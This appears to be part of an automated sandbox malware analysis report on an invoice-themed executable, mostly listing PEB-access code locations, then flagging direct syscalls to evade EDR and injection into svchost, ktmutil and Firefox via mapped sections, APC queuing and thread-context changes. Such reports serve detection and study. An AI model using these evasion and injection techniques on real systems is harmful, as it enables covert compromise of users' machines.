                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A68A90 mov edx, dword ptr fs:[00000030h]4_2_03A68A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6AAEE mov eax, dword ptr fs:[00000030h]4_2_03A6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6AAEE mov eax, dword ptr fs:[00000030h]4_2_03A6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A86ACC mov eax, dword ptr fs:[00000030h]4_2_03A86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A86ACC mov eax, dword ptr fs:[00000030h]4_2_03A86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A86ACC mov eax, dword ptr fs:[00000030h]4_2_03A86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A30AD0 mov eax, dword ptr fs:[00000030h]4_2_03A30AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A64AD0 mov eax, dword ptr fs:[00000030h]4_2_03A64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A64AD0 mov eax, dword ptr fs:[00000030h]4_2_03A64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6CA24 mov eax, dword ptr fs:[00000030h]4_2_03A6CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5EA2E mov eax, dword ptr fs:[00000030h]4_2_03A5EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A54A35 mov eax, dword ptr fs:[00000030h]4_2_03A54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A54A35 mov eax, dword ptr fs:[00000030h]4_2_03A54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6CA38 mov eax, dword ptr fs:[00000030h]4_2_03A6CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03ABCA11 mov eax, dword ptr fs:[00000030h]4_2_03ABCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6CA6F mov eax, dword ptr fs:[00000030h]4_2_03A6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6CA6F mov eax, dword ptr fs:[00000030h]4_2_03A6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6CA6F mov eax, dword ptr fs:[00000030h]4_2_03A6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AACA72 mov eax, dword ptr fs:[00000030h]4_2_03AACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AACA72 mov eax, dword ptr fs:[00000030h]4_2_03AACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A36A50 mov eax, dword ptr fs:[00000030h]4_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A36A50 mov eax, dword ptr fs:[00000030h]4_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A36A50 mov eax, dword ptr fs:[00000030h]4_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A36A50 mov eax, dword ptr fs:[00000030h]4_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A36A50 mov eax, dword ptr fs:[00000030h]4_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A36A50 mov eax, dword ptr fs:[00000030h]4_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A36A50 mov eax, dword ptr fs:[00000030h]4_2_03A36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40A5B mov eax, dword ptr fs:[00000030h]4_2_03A40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40A5B mov eax, dword ptr fs:[00000030h]4_2_03A40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A429A0 mov eax, dword ptr fs:[00000030h]4_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A429A0 mov eax, dword ptr fs:[00000030h]4_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A429A0 mov eax, dword ptr fs:[00000030h]4_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A429A0 mov eax, dword ptr fs:[00000030h]4_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A429A0 mov eax, dword ptr fs:[00000030h]4_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A429A0 mov eax, dword ptr fs:[00000030h]4_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A429A0 mov eax, dword ptr fs:[00000030h]4_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A429A0 mov eax, dword ptr fs:[00000030h]4_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A429A0 mov eax, dword ptr fs:[00000030h]4_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A429A0 mov eax, dword ptr fs:[00000030h]4_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A429A0 mov eax, dword ptr fs:[00000030h]4_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A429A0 mov eax, dword ptr fs:[00000030h]4_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A429A0 mov eax, dword ptr fs:[00000030h]4_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A309AD mov eax, dword ptr fs:[00000030h]4_2_03A309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A309AD mov eax, dword ptr fs:[00000030h]4_2_03A309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB89B3 mov esi, dword ptr fs:[00000030h]4_2_03AB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB89B3 mov eax, dword ptr fs:[00000030h]4_2_03AB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB89B3 mov eax, dword ptr fs:[00000030h]4_2_03AB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03ABE9E0 mov eax, dword ptr fs:[00000030h]4_2_03ABE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A629F9 mov eax, dword ptr fs:[00000030h]4_2_03A629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A629F9 mov eax, dword ptr fs:[00000030h]4_2_03A629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC69C0 mov eax, dword ptr fs:[00000030h]4_2_03AC69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]4_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]4_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]4_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]4_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]4_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]4_2_03A3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A649D0 mov eax, dword ptr fs:[00000030h]4_2_03A649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AFA9D3 mov eax, dword ptr fs:[00000030h]4_2_03AFA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB892A mov eax, dword ptr fs:[00000030h]4_2_03AB892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC892B mov eax, dword ptr fs:[00000030h]4_2_03AC892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAE908 mov eax, dword ptr fs:[00000030h]4_2_03AAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAE908 mov eax, dword ptr fs:[00000030h]4_2_03AAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03ABC912 mov eax, dword ptr fs:[00000030h]4_2_03ABC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A28918 mov eax, dword ptr fs:[00000030h]4_2_03A28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A28918 mov eax, dword ptr fs:[00000030h]4_2_03A28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A56962 mov eax, dword ptr fs:[00000030h]4_2_03A56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A56962 mov eax, dword ptr fs:[00000030h]4_2_03A56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A56962 mov eax, dword ptr fs:[00000030h]4_2_03A56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A7096E mov eax, dword ptr fs:[00000030h]4_2_03A7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A7096E mov edx, dword ptr fs:[00000030h]4_2_03A7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A7096E mov eax, dword ptr fs:[00000030h]4_2_03A7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD4978 mov eax, dword ptr fs:[00000030h]4_2_03AD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD4978 mov eax, dword ptr fs:[00000030h]4_2_03AD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03ABC97C mov eax, dword ptr fs:[00000030h]4_2_03ABC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB0946 mov eax, dword ptr fs:[00000030h]4_2_03AB0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A30887 mov eax, dword ptr fs:[00000030h]4_2_03A30887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03ABC89D mov eax, dword ptr fs:[00000030h]4_2_03ABC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AFA8E4 mov eax, dword ptr fs:[00000030h]4_2_03AFA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]4_2_03A6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]4_2_03A6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5E8C0 mov eax, dword ptr fs:[00000030h]4_2_03A5E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A52835 mov eax, dword ptr fs:[00000030h]4_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A52835 mov eax, dword ptr fs:[00000030h]4_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A52835 mov eax, dword ptr fs:[00000030h]4_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A52835 mov ecx, dword ptr fs:[00000030h]4_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A52835 mov eax, dword ptr fs:[00000030h]4_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A52835 mov eax, dword ptr fs:[00000030h]4_2_03A52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6A830 mov eax, dword ptr fs:[00000030h]4_2_03A6A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD483A mov eax, dword ptr fs:[00000030h]4_2_03AD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD483A mov eax, dword ptr fs:[00000030h]4_2_03AD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03ABC810 mov eax, dword ptr fs:[00000030h]4_2_03ABC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03ABE872 mov eax, dword ptr fs:[00000030h]4_2_03ABE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03ABE872 mov eax, dword ptr fs:[00000030h]4_2_03ABE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC6870 mov eax, dword ptr fs:[00000030h]4_2_03AC6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC6870 mov eax, dword ptr fs:[00000030h]4_2_03AC6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A42840 mov ecx, dword ptr fs:[00000030h]4_2_03A42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A60854 mov eax, dword ptr fs:[00000030h]4_2_03A60854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A34859 mov eax, dword ptr fs:[00000030h]4_2_03A34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A34859 mov eax, dword ptr fs:[00000030h]4_2_03A34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6CF80 mov eax, dword ptr fs:[00000030h]4_2_03A6CF80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A62F98 mov eax, dword ptr fs:[00000030h]4_2_03A62F98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A62F98 mov eax, dword ptr fs:[00000030h]4_2_03A62F98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4CFE0 mov eax, dword ptr fs:[00000030h]4_2_03A4CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4CFE0 mov eax, dword ptr fs:[00000030h]4_2_03A4CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A70FF6 mov eax, dword ptr fs:[00000030h]4_2_03A70FF6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A70FF6 mov eax, dword ptr fs:[00000030h]4_2_03A70FF6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A70FF6 mov eax, dword ptr fs:[00000030h]4_2_03A70FF6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A70FF6 mov eax, dword ptr fs:[00000030h]4_2_03A70FF6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B04FE7 mov eax, dword ptr fs:[00000030h]4_2_03B04FE7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AE6FF7 mov eax, dword ptr fs:[00000030h]4_2_03AE6FF7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A32FC8 mov eax, dword ptr fs:[00000030h]4_2_03A32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A32FC8 mov eax, dword ptr fs:[00000030h]4_2_03A32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A32FC8 mov eax, dword ptr fs:[00000030h]4_2_03A32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A32FC8 mov eax, dword ptr fs:[00000030h]4_2_03A32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2EFD8 mov eax, dword ptr fs:[00000030h]4_2_03A2EFD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2EFD8 mov eax, dword ptr fs:[00000030h]4_2_03A2EFD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2EFD8 mov eax, dword ptr fs:[00000030h]4_2_03A2EFD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5EF28 mov eax, dword ptr fs:[00000030h]4_2_03A5EF28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AE6F00 mov eax, dword ptr fs:[00000030h]4_2_03AE6F00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A32F12 mov eax, dword ptr fs:[00000030h]4_2_03A32F12
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6CF1F mov eax, dword ptr fs:[00000030h]4_2_03A6CF1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5AF69 mov eax, dword ptr fs:[00000030h]4_2_03A5AF69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5AF69 mov eax, dword ptr fs:[00000030h]4_2_03A5AF69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD2F60 mov eax, dword ptr fs:[00000030h]4_2_03AD2F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD2F60 mov eax, dword ptr fs:[00000030h]4_2_03AD2F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B04F68 mov eax, dword ptr fs:[00000030h]4_2_03B04F68
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB4F40 mov eax, dword ptr fs:[00000030h]4_2_03AB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB4F40 mov eax, dword ptr fs:[00000030h]4_2_03AB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB4F40 mov eax, dword ptr fs:[00000030h]4_2_03AB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB4F40 mov eax, dword ptr fs:[00000030h]4_2_03AB4F40
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0022A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,2_2_0022A66C
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_002181AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_002181AC
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_00218189 SetUnhandledExceptionFilter,2_2_00218189

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtTerminateProcess: Direct from: 0x77382D5CJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\ktmutil.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\ktmutil.exeThread register set: target process: 4048Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\ktmutil.exeThread APC queued: target process: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 30DF008Jump to behavior
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exeCode function: 2_2_0022B106 LogonUserW,2_2_0022B106
